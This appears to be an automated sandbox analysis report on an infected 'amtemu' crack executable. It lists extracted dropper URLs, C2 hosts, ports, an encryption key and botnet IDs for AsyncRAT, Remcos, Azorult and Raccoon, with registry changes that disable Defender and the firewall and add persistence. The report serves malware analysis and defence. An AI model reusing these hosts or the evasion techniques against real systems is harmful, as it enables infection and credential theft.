Overview
overview
10Static
static
8ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10Resubmissions
12-11-2021 18:04
211112-wnzb8aahhm 1019-11-2020 10:08
201119-rhwlt38jrx 1018-11-2020 17:26
201118-htd4fq29va 10Analysis
-
max time kernel
1806s -
max time network
1816s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
19-11-2020 10:08
Static task
static1
Behavioral task
behavioral1
Sample
1.bin/1.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
2019-09-02_22-41-10.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
31.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
3DMark 11 Advanced Edition.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
Resource
win10v20201028
Behavioral task
behavioral6
Sample
Archive.zip__ccacaxs2tbz2t6ob3e.exe
Resource
win10v20201028
Behavioral task
behavioral7
Sample
CVE-2018-15982_PoC.swf
Resource
win10v20201028
Behavioral task
behavioral8
Sample
CVWSHSetup[1].bin/WSHSetup[1].exe
Resource
win10v20201028
Behavioral task
behavioral9
Sample
DiskInternals_Uneraser_v5_keygen.exe
Resource
win10v20201028
Behavioral task
behavioral10
Sample
ForceOp 2.8.7 - By RaiSence.exe
Resource
win10v20201028
Behavioral task
behavioral11
Sample
HYDRA.exe
Resource
win10v20201028
Behavioral task
behavioral12
Sample
Keygen.exe
Resource
win10v20201028
Behavioral task
behavioral13
Sample
Lonelyscreen.1.2.9.keygen.by.Paradox/Lonelyscreen.1.2.9.keygen.by.Paradox.exe
Resource
win10v20201028
Behavioral task
behavioral14
Sample
LtHv0O2KZDK4M637.exe
Resource
win10v20201028
Behavioral task
behavioral15
Sample
Magic_File_v3_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral16
Sample
OnlineInstaller.exe
Resource
win10v20201028
Behavioral task
behavioral17
Sample
Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe
Resource
win10v20201028
Behavioral task
behavioral18
Sample
SecurityTaskManager_Setup.exe
Resource
win10v20201028
Behavioral task
behavioral19
Sample
Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe
Resource
win10v20201028
Behavioral task
behavioral20
Sample
VyprVPN.exe
Resource
win10v20201028
Behavioral task
behavioral21
Sample
WSHSetup[1].exe
Resource
win10v20201028
Behavioral task
behavioral22
Sample
___ _ _____ __ ___/전산 및 비전산자료 보존 요청서/전산 및 비전산자료 보존 요.exe
Resource
win10v20201028
Behavioral task
behavioral23
Sample
___ _ _____ __ ___/전산 및 비전산자료 보존 요청서/전산 및 비전산자료 보존 요.exe
Resource
win10v20201028
Behavioral task
behavioral24
Sample
amtemu.v0.9.2.win-painter_edited.exe
Resource
win10v20201028
Behavioral task
behavioral25
Sample
api.exe
Resource
win10v20201028
Behavioral task
behavioral26
Sample
default.exe
Resource
win10v20201028
Behavioral task
behavioral27
Sample
efd97b1038e063779fb32a3ab35adc481679a5c6c8e3f4f69c44987ff08b6ea4.js
Resource
win10v20201028
Behavioral task
behavioral28
Sample
good.exe
Resource
win10v20201028
Behavioral task
behavioral29
Sample
infected dot net installer.exe
Resource
win10v20201028
Behavioral task
behavioral30
Sample
oof.exe
Resource
win10v20201028
Behavioral task
behavioral31
Sample
ou55sg33s_1.exe
Resource
win10v20201028
General
-
Target
amtemu.v0.9.2.win-painter_edited.exe
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://bit.do/fqhHT
exe.dropper
http://bit.do/fqhHT
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://zxvbcrt.ug/zxcvb.exe
exe.dropper
http://zxvbcrt.ug/zxcvb.exe
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://bit.do/fqhJv
exe.dropper
http://bit.do/fqhJv
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://pdshcjvnv.ug/zxcvb.exe
exe.dropper
http://pdshcjvnv.ug/zxcvb.exe
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://bit.do/fqhJD
exe.dropper
http://bit.do/fqhJD
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://rbcxvnb.ug/zxcvb.exe
exe.dropper
http://rbcxvnb.ug/zxcvb.exe
Extracted
Family
raccoon
Botnet
5e4db353b88c002ba6466c06437973619aad03b3
Attributes
-
url4cnc
https://telete.in/brikitiki
rc4.plain
rc4.plain
Extracted
Family
azorult
C2
http://195.245.112.115/index.php
Extracted
Family
asyncrat
Version
0.5.7B
C2
agentttt.ac.ug:6970
agentpurple.ac.ug:6970
Attributes
-
aes_key
16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
agentttt.ac.ug,agentpurple.ac.ug
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
6970
-
version
0.5.7B
aes.plain
Extracted
Family
remcos
C2
taenaia.ac.ug:6969
agentpapple.ac.ug:6969
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Contains code to disable Windows Defender ⋅ 10 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral24/memory/496-621-0x000000000040616E-mapping.dmp disable_win_def behavioral24/memory/496-620-0x0000000000400000-0x000000000040C000-memory.dmp disable_win_def behavioral24/memory/1772-632-0x0000000000400000-0x0000000000408000-memory.dmp disable_win_def behavioral24/memory/1772-633-0x0000000000403BEE-mapping.dmp disable_win_def behavioral24/files/0x000200000001ab95-663.dat disable_win_def behavioral24/files/0x000200000001ab95-662.dat disable_win_def behavioral24/memory/5660-1156-0x000000000040616E-mapping.dmp disable_win_def behavioral24/memory/5852-1166-0x0000000000403BEE-mapping.dmp disable_win_def behavioral24/files/0x000400000001abc1-1190.dat disable_win_def behavioral24/files/0x000400000001abc1-1189.dat disable_win_def -
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modifies firewall policy service ⋅ 2 TTPs 8 IoCs
Processes:
explorer.exe9119gy3q5_1.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile 9119gy3q5_1.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" 9119gy3q5_1.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile 9119gy3q5_1.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" 9119gy3q5_1.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe -
Modifies security service ⋅ 2 TTPs 1 IoCs
Processes:
regedit.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\ImagePath regedit.exe -
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
Async RAT payload ⋅ 3 IoCs
Processes:
resource yara_rule behavioral24/memory/552-611-0x000000000040C76E-mapping.dmp asyncrat behavioral24/memory/552-610-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral24/memory/1928-1147-0x000000000040C76E-mapping.dmp asyncrat -
ModiLoader First Stage ⋅ 2 IoCs
Processes:
resource yara_rule behavioral24/memory/4504-682-0x0000000002A60000-0x0000000002ABC000-memory.dmp modiloader_stage1 behavioral24/memory/4828-1199-0x0000000002A70000-0x0000000002ACC000-memory.dmp modiloader_stage1 -
Blocklisted process makes network request ⋅ 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid process 24 5112 powershell.exe 26 5112 powershell.exe 28 4412 powershell.exe 30 4412 powershell.exe 32 4464 powershell.exe 34 4464 powershell.exe -
Disables taskbar notifications via registry modification
-
Disables use of System Restore points ⋅ 1 TTPs
TTPs:
-
Downloads MZ/PE file
-
Drops file in Drivers directory ⋅ 1 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe -
Executes dropped EXE ⋅ 50 IoCs
Processes:
key.exeMicrosoft.VisualStudio.Package.LanguageService.11.0.exedata.datbb.exebb.exeputtty.exeereds.exeKeygen.exenqu.exeejf.exeFGbfttrev.exeFDvbcgfert.exeejf.exeabx.exeFGbfttrev.exeFDvbcgfert.exehGSBLC0mMB.exe9Dq25VPs74.exeBKqzN9zoCZ.exeMYbv6sblhd.exe9119gy3q5_1.exe9119gy3q5_1.exehGSBLC0mMB.exehGSBLC0mMB.exeBKqzN9zoCZ.exeBKqzN9zoCZ.exeMYbv6sblhd.exenynibecq.exei533usso357o795.exe333u357995k.exeazchgftrq.exenqu.exenqu.exeFGbfttrev.exeFDvbcgfert.exe333u357995k.exeFDvbcgfert.exeFGbfttrev.exeRxfEjqsctc.exeQufVBH3jUE.exefYDz9wNnYe.exea0k7SvAzhM.exeozchgftrq.exeazchgftrq.exeRxfEjqsctc.exeRxfEjqsctc.exefYDz9wNnYe.exea0k7SvAzhM.exe2eurzuuj.exeozchgftrq.exepid process 3604 key.exe 3212 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 3140 data.dat 4472 bb.exe 652 bb.exe 1780 puttty.exe 928 ereds.exe 3684 Keygen.exe 720 nqu.exe 5096 ejf.exe 1796 FGbfttrev.exe 4240 FDvbcgfert.exe 4236 ejf.exe 2012 abx.exe 5116 FGbfttrev.exe 4404 FDvbcgfert.exe 4244 hGSBLC0mMB.exe 4504 9Dq25VPs74.exe 4660 BKqzN9zoCZ.exe 4380 MYbv6sblhd.exe 4428 9119gy3q5_1.exe 4468 9119gy3q5_1.exe 3132 hGSBLC0mMB.exe 552 hGSBLC0mMB.exe 2788 BKqzN9zoCZ.exe 496 BKqzN9zoCZ.exe 1772 MYbv6sblhd.exe 3964 nynibecq.exe 4572 i533usso357o795.exe 5252 333u357995k.exe 5300 azchgftrq.exe 5472 nqu.exe 5052 nqu.exe 5888 FGbfttrev.exe 5404 FDvbcgfert.exe 3960 333u357995k.exe 5284 FDvbcgfert.exe 4624 FGbfttrev.exe 5484 RxfEjqsctc.exe 4828 QufVBH3jUE.exe 5512 fYDz9wNnYe.exe 3876 a0k7SvAzhM.exe 3620 ozchgftrq.exe 1404 azchgftrq.exe 5456 RxfEjqsctc.exe 1928 RxfEjqsctc.exe 5660 fYDz9wNnYe.exe 5852 a0k7SvAzhM.exe 5848 2eurzuuj.exe 1336 ozchgftrq.exe -
Sets file execution options in registry ⋅ 2 TTPs
-
Sets service image path in registry ⋅ 2 TTPs
-
Checks BIOS information in registry ⋅ 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
explorer.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe -
Loads dropped DLL ⋅ 22 IoCs
Processes:
data.datejf.exeFDvbcgfert.exenqu.exeFDvbcgfert.exeozchgftrq.exepid process 3140 data.dat 4236 ejf.exe 4404 FDvbcgfert.exe 4404 FDvbcgfert.exe 4404 FDvbcgfert.exe 4236 ejf.exe 4236 ejf.exe 4236 ejf.exe 4236 ejf.exe 4236 ejf.exe 5052 nqu.exe 5052 nqu.exe 5052 nqu.exe 5052 nqu.exe 5052 nqu.exe 5052 nqu.exe 5284 FDvbcgfert.exe 5284 FDvbcgfert.exe 5284 FDvbcgfert.exe 1336 ozchgftrq.exe 1336 ozchgftrq.exe 1336 ozchgftrq.exe -
Reads user/profile data of local email clients ⋅ 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers ⋅ 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
MYbv6sblhd.exea0k7SvAzhM.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features MYbv6sblhd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" MYbv6sblhd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" a0k7SvAzhM.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting ⋅ 2 TTPs
-
Adds Run key to start application ⋅ 2 TTPs 13 IoCs
Processes:
regedit.exe9Dq25VPs74.exeexplorer.exedata.datdescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 5.0 = "\"C:\\ProgramData\\Google Updater 5.0\\9119gy3q5.exe\"" regedit.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Zsle = "C:\\Users\\Admin\\AppData\\Local\\elsZ.url" 9Dq25VPs74.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce explorer.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorer.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run data.dat Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 5.0 = "\"C:\\ProgramData\\Google Updater 5.0\\9119gy3q5.exe\"" data.dat Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce regedit.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 5.0 = "C:\\ProgramData\\Google Updater 5.0\\9119gy3q5.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 5.0 = "\"C:\\ProgramData\\Google Updater 5.0\\9119gy3q5.exe\"" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 5.0 = "\"C:\\ProgramData\\Google Updater 5.0\\9119gy3q5.exe\"" data.dat Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 5.0 = "\"C:\\ProgramData\\Google Updater 5.0\\9119gy3q5.exe\"" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce data.dat -
Checks for any installed AV software in registry ⋅ 1 TTPs 2 IoCs
Processes:
9119gy3q5_1.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\AntiVirService 9119gy3q5_1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\avast! Antivirus 9119gy3q5_1.exe -
Checks installed software on the system ⋅ 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
TTPs:
-
Processes:
9119gy3q5_1.exei533usso357o795.execmd.exekey.exemshta.execmd.exebb.exeputtty.execmd.exeKeygen.exedata.datmshta.exenqu.exeejf.exe333u357995k.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 9119gy3q5_1.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA i533usso357o795.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA key.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA bb.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA puttty.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Keygen.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA data.dat Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA nqu.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ejf.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 333u357995k.exe -
Drops desktop.ini file(s) ⋅ 3 IoCs
Processes:
explorer.exenqu.exeejf.exedescription ioc process File opened for modification C:\ProgramData\Google Updater 5.0\desktop.ini explorer.exe File created C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini nqu.exe File created C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini ejf.exe -
Maps connected drives based on registry ⋅ 3 TTPs 32 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
dw20.exepowershell.exedata.datpowershell.exepowershell.exemshta.execmd.exenqu.exeejf.execmd.exeKeygen.exekey.exei533usso357o795.exeputtty.execmd.exe333u357995k.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum powershell.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum data.dat Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum powershell.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 powershell.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 mshta.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 cmd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 data.dat Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum nqu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum ejf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum Keygen.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum dw20.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 key.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum i533usso357o795.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 cmd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 Keygen.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum key.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum puttty.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum 333u357995k.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 333u357995k.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 nqu.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 ejf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum cmd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 i533usso357o795.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 puttty.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 cmd.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger ⋅ 64 IoCs
Processes:
bb.exeexplorer.exedata.datputtty.execmd.exeKeygen.exedw20.exekey.exepowershell.exeejf.exepowershell.exeFGbfttrev.exeFDvbcgfert.exepowershell.exenqu.exe9119gy3q5_1.execmd.exei533usso357o795.exepid process 652 bb.exe 1288 explorer.exe 1288 explorer.exe 1288 explorer.exe 1288 explorer.exe 1288 explorer.exe 1288 explorer.exe 3140 data.dat 3140 data.dat 3140 data.dat 3140 data.dat 1780 puttty.exe 1780 puttty.exe 1780 puttty.exe 1780 puttty.exe 1288 explorer.exe 1288 explorer.exe 5044 cmd.exe 3684 Keygen.exe 1428 dw20.exe 3604 key.exe 3684 Keygen.exe 3684 Keygen.exe 3684 Keygen.exe 4464 powershell.exe 1428 dw20.exe 1428 dw20.exe 1428 dw20.exe 3604 key.exe 3604 key.exe 3604 key.exe 4464 powershell.exe 4464 powershell.exe 4464 powershell.exe 4236 ejf.exe 4236 ejf.exe 556 powershell.exe 556 powershell.exe 556 powershell.exe 5116 FGbfttrev.exe 556 powershell.exe 5116 FGbfttrev.exe 4404 FDvbcgfert.exe 4404 FDvbcgfert.exe 4668 powershell.exe 720 nqu.exe 720 nqu.exe 720 nqu.exe 720 nqu.exe 4236 ejf.exe 4236 ejf.exe 4236 ejf.exe 4236 ejf.exe 1288 explorer.exe 1288 explorer.exe 1288 explorer.exe 4468 9119gy3q5_1.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4172 cmd.exe 4572 i533usso357o795.exe 4572 i533usso357o795.exe 4572 i533usso357o795.exe -
Suspicious use of SetThreadContext ⋅ 19 IoCs
Processes:
bb.exeejf.exeFGbfttrev.exeFDvbcgfert.exe9119gy3q5_1.exehGSBLC0mMB.exeBKqzN9zoCZ.exeMYbv6sblhd.exenqu.exe333u357995k.exeFDvbcgfert.exeFGbfttrev.exe9Dq25VPs74.exeazchgftrq.exeRxfEjqsctc.exefYDz9wNnYe.exea0k7SvAzhM.exeQufVBH3jUE.exeozchgftrq.exedescription pid process target process PID 4472 set thread context of 652 4472 bb.exe bb.exe PID 5096 set thread context of 4236 5096 ejf.exe ejf.exe PID 1796 set thread context of 5116 1796 FGbfttrev.exe FGbfttrev.exe PID 4240 set thread context of 4404 4240 FDvbcgfert.exe FDvbcgfert.exe PID 4428 set thread context of 4468 4428 9119gy3q5_1.exe 9119gy3q5_1.exe PID 4244 set thread context of 552 4244 hGSBLC0mMB.exe hGSBLC0mMB.exe PID 4660 set thread context of 496 4660 BKqzN9zoCZ.exe BKqzN9zoCZ.exe PID 4380 set thread context of 1772 4380 MYbv6sblhd.exe MYbv6sblhd.exe PID 720 set thread context of 5052 720 nqu.exe nqu.exe PID 5252 set thread context of 3960 5252 333u357995k.exe 333u357995k.exe PID 5404 set thread context of 5284 5404 FDvbcgfert.exe FDvbcgfert.exe PID 5888 set thread context of 4624 5888 FGbfttrev.exe FGbfttrev.exe PID 4504 set thread context of 5056 4504 9Dq25VPs74.exe ieinstal.exe PID 5300 set thread context of 1404 5300 azchgftrq.exe azchgftrq.exe PID 5484 set thread context of 1928 5484 RxfEjqsctc.exe RxfEjqsctc.exe PID 5512 set thread context of 5660 5512 fYDz9wNnYe.exe fYDz9wNnYe.exe PID 3876 set thread context of 5852 3876 a0k7SvAzhM.exe a0k7SvAzhM.exe PID 4828 set thread context of 7132 4828 QufVBH3jUE.exe ieinstal.exe PID 3620 set thread context of 1336 3620 ozchgftrq.exe ozchgftrq.exe -
Enumerates physical storage devices ⋅ 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry ⋅ 2 TTPs 9 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
9119gy3q5_1.exeFDvbcgfert.exebb.exeexplorer.exeFDvbcgfert.exeozchgftrq.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 9119gy3q5_1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString FDvbcgfert.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 bb.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString FDvbcgfert.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 9119gy3q5_1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ozchgftrq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString bb.exe -
Delays execution with timeout.exe ⋅ 8 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 980 timeout.exe 1948 timeout.exe 4092 timeout.exe 196 timeout.exe 4984 timeout.exe 6028 timeout.exe 2776 timeout.exe 3460 timeout.exe -
Enumerates system info in registry ⋅ 2 TTPs 2 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe -
Kills process with taskkill ⋅ 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 804 taskkill.exe 2444 taskkill.exe 5552 taskkill.exe 3084 taskkill.exe 2936 taskkill.exe -
Modifies Internet Explorer Protected Mode ⋅ 1 TTPs 4 IoCs
TTPs:
Processes:
